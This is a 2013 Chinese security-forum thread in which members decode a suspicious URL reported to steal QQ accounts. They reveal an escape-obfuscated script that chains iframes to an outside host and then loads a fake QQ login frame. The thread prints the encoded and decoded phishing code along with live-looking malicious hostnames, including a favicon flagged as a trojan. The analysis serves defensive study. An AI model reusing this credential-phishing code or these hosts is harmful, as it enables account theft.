hxxp://app6.cpic.com.cn/1az/index.php?i=/G/m.aspx?/705/311

用户名不存在

有QQ好友说点了这个网址以后被盗号，求鉴定，话说我好像打不开，囧一下

1. app6.cpic.com.cn/1az/index.php?i=/G/m.aspx?/705/311

复制代码

dayangyang

1. <script>document.write(unescape('%3Chtml%3E%0A%3Chead%3E%0A%3Cmeta%20http-equiv%3D%22Content-Type%22%20content%3D%22text/html%3B%20charset%3Dgb2312%22%20/%3E%0A%3C/head%3E%0A%3Cscript%20type%3D%22text/javascript%22%3E%0Avar%20OnMessage%20%3D%20function%20%28e%29%20%7B%0A%09document.title%3De.data%3B%0A%7D%0Afunction%20init%28%29%20%7B%0A%09if%20%28window.addEventListener%29%20%7B%20%0A%09%09window.addEventListener%28%22message%22%2C%20OnMessage%2C%20false%29%3B%0A%09%7D%20else%20%7B%0A%09%09if%20%28window.attachEvent%29%20%7B%20%0A%09%09window.attachEvent%28%22onmessage%22%2C%20OnMessage%29%3B%0A%09%09%7D%0A%09%7D%0A%7D%0A%09init%28%29%3B%0A%3C/script%3E%0A%3Cbody%20style%3D%27margin%3A0px%3Boverflow%3Ahidden%3B%27%3E%0A%3Ciframe%20id%3D%27tt%27%20height%3D%27100%25%27%20src%3D%22http%3A//diue.buies.Jkub.com/klz/%3F38&68&570887%22%20frameborder%3D0%20width%3D%27100%25%27%20name%3D%27tt%27%20marginHeight%3D0%20marginWidth%3D0%3E%20%3C/iframe%3E%0A%3C/body%3E%0A%3C/html%3E'))</script>

复制代码

escape加密的。。直接把document.write改alert得出：

1. <html><head><meta http-equiv="Content-Type" content="text/html; charset=gb2312" /></head><script type="text/javascript">var OnMessage = function (e) {        document.title=e.data;}function init() {        if (window.addEventListener) {                 window.addEventListener("message", OnMessage, false);        } else {                if (window.attachEvent) {                 window.attachEvent("onmessage", OnMessage);                }        }}        init();</script><body style='margin:0px;overflow:hidden;'><iframe id='tt' height='100%' src="http://diue.buies.Jkub.com/klz/?38&68&570887" frameborder=0 width='100%' name='tt' marginHeight=0 marginWidth=0> </iframe></body></html>

复制代码

转到了view-source:http://diue.buies.jkub.com/klz/?38&68&570887

1. <html xmlns="http://www.w3.org/1999/xhtml">
   
2. <head>
   
3. <meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
   
4. </head>
   
5. <link href="Auxiliary/locss.css" rel="stylesheet" type="text/css" />
   
6. <script type="text/javascript" src="Auxiliary/tojs.asp"></script>
   
7. <body>
   
8. </body>
   

复制代码

其中的Auxiliary/tojs.asp

1. try {if(window != window.top) {window.top.postMessage('紫夜精灵','*');}else{document.title = '紫夜精灵';}}catch(e) {} function tu(obj) { obj.style.visibility='visible'; var iframe = document.getElementById("embed_login").contentWindow; if(iframe.document.activeElement.id == "") { if(iframe.document.getElementById("number").value == "") { iframe.document.getElementById("number").focus(); }else { iframe.document.getElementById("PassWord").focus(); } } } function tz() { if(document.documentElement.scrollLeft+document.documentElement.clientWidth>=document.body.scrollWidth) { document.documentElement.scrollLeft=document.body.scrollWidth-document.documentElement.clientWidth; } if(document.documentElement.scrollTop+document.documentElement.clientHeight>=document.body.scrollHeight) { document.documentElement.scrollTop=document.body.scrollHeight-document.documentElement.clientHeight; } } document.write("
   
2. "+unescape('%3Cdiv%20id%3D%22Layer2_x%22%3E%3CIFRAME%20id%3D%22embed_login%22%20height%3D%22100%25%22%20frameBorder%3D%220%22%20marginHeight%3D0%20marginWidth%3D0%20width%3D%22100%25%22%20name%3D%22embed_login%22%20scrolling%3D%22no%22%20src%3D%22login2.asp%3F38/68%22%20onload%3D%22tu%28Layer2_x%29%3B%22%3E%3C/IFRAME%3E%3C/div%3E')+"")

复制代码

继续。。。对了这段里有个base64加密的图片，应该是木马。。。ESET也报了
加密这段解下来是
：

1. <div id="Layer2_x"><IFRAME id="embed_login" height="100%" frameBorder="0" marginHeight=0 marginWidth=0 width="100%" name="embed_login" scrolling="no" src="login2.asp?38/68" onload="tu(Layer2_x);"></IFRAME></div>

复制代码

到这里login2.asp?38/68 打不开了。。不过打开ESET会提示这个是恶意网页。。可能失效

蓝核

dayangyang 发表于 2013-4-24 21:48
escape加密的。。直接把document.write改alert得出：转到了view-source:http://diue.buies.jkub.com/klz/?3 ...

难道没有失效么……

蓝核

按照dayangyang的代码
应该这一步就算结束我个人以为

1. <iframe id='tt' height='100%' src="http://diue.buies.Jkub.com/klz/?38&68&570887" frameborder=0 width='100%' name='tt' marginHeight=0 marginWidth=0> </iframe>
   
2. </body>
   
3. </html>

复制代码

dayangyang

蓝核 发表于 2013-4-24 22:00
按照dayangyang的代码
应该这一步就算结束我个人以为

解码总想解到底啊。。好久没解到有shellcode的了

dayangyang

蓝核 发表于 2013-4-24 21:57
难道没有失效么……

tojs.asp中那个图片还是有效地http://diue.buies.jkub.com//favicon.ico

蓝核

dayangyang 发表于 2013-4-24 22:07
解码总想解到底啊。。好久没解到有shellcode的了

这……你加油，解出来之后记得开贴